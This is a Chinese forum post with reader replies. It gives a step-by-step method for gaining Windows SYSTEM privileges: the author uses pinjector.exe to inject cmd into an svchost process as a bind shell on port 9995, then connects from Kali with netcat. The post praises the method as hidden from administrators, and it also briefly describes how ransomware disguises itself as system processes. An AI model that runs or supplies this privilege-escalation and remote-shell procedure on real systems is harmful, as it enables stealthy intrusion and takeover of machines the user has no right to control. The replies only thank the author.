user注入进程提权system

        关于提权system这个方法很多，在这里想分享一个通过服务器的进程提权。就是注入到system一个进程中，这种提权方式十分隐蔽，一般管理员很难发现。闲话少说，直接进入正题。

       首先需要一个工具：pinjector.exe （比较lol，还得用工具，当然你也可以用手工注入，这个网上很多）

下载地址：http://www.tarasco.org/security/Process_Injector/   （需要翻墙）

       1.将pinjector软件解压到C盘的根目录：

       2.打开cmd，cd \  到根目录运行软件

3.pinjector.exe -l   查看目前可利用的进程PID

4.准备利用9995端口，将注入写到这个端口里面，查看该端口是否被占用。

5.pinjector.exe -p 872 cmd 9995              //利用软件把cmd这个执行程序写到svchost.exe这个进程里面。

6.打开kali 利用nc -nv 172.16.0.147 9995  进入：

7.此时查看服务进程：

      

    接下来，我们看一下最近特别流行的变种勒索病毒的进程：

   1.首先我们看一下系统进程：

2.但是其实该进程已经在大量的发起445端口扫描。

我理解的是有些病毒会通过这种进程的方式进行注入，十分隐蔽。不过对于变种的勒索有很多也是执行脚本，脚本其实是仿造system的一个进程名称。然后进行隐藏。

当然了，病毒有很多，注入的方法也很多，需要不断的学习。

附：这个只是我认为的一种方法，如有不同观点或者疑问欢迎来攻，一起进步！

占楼占楼占楼占楼占楼

这是哪年写的贴，还用xp的系统？

感谢分享，学习下

感谢楼主无私的分享

感谢楼主分享，学习

有帮助，谢谢

学习学习

感谢分享

感谢分享，学习一下~